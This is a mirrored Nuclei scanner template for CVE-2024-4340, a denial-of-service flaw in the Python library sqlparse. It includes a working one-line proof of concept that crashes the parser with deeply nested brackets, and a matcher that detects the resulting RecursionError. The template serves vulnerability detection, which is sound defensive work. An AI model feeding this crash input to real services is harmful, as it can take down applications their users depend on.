admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-11 05:03:18 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
e2e9901bf9ec94de03e5ed7490847aac0ccbc598
nuclei-templates/code/cves/2024/CVE-2024-4340.yaml
ghost d3b492bf9e chore: sign templates 🤖
2025-07-03 08:27:23 +00:00

32 lines
1023 B
YAML
Raw Blame History

id: CVE-2024-4340
info:
name: sqlparse - Denial of Service
author: KoYejune0302,cheoljun99,sim4110,gy741
severity: high
description: |
Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2024-4340
epss-score: 0.15598
epss-percentile: 0.94407
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4340
tags: cve,cve2024,py,code,dos,python,sqlparse
self-contained: true
code:
- engine:
- sh
- bash
source: |
python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"
matchers:
- type: word
part: stderr
words:
- "RecursionError: maximum recursion depth exceeded"
# digest: 490a0046304402204fca66bc1127003bf7091c3ef4aa8c9a979c22405fb23f6e34ed6ef18a8b0daa0220188f7df879246724eac3b609b7bba222ff83e2a839029e7a0ef168c88260941c:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink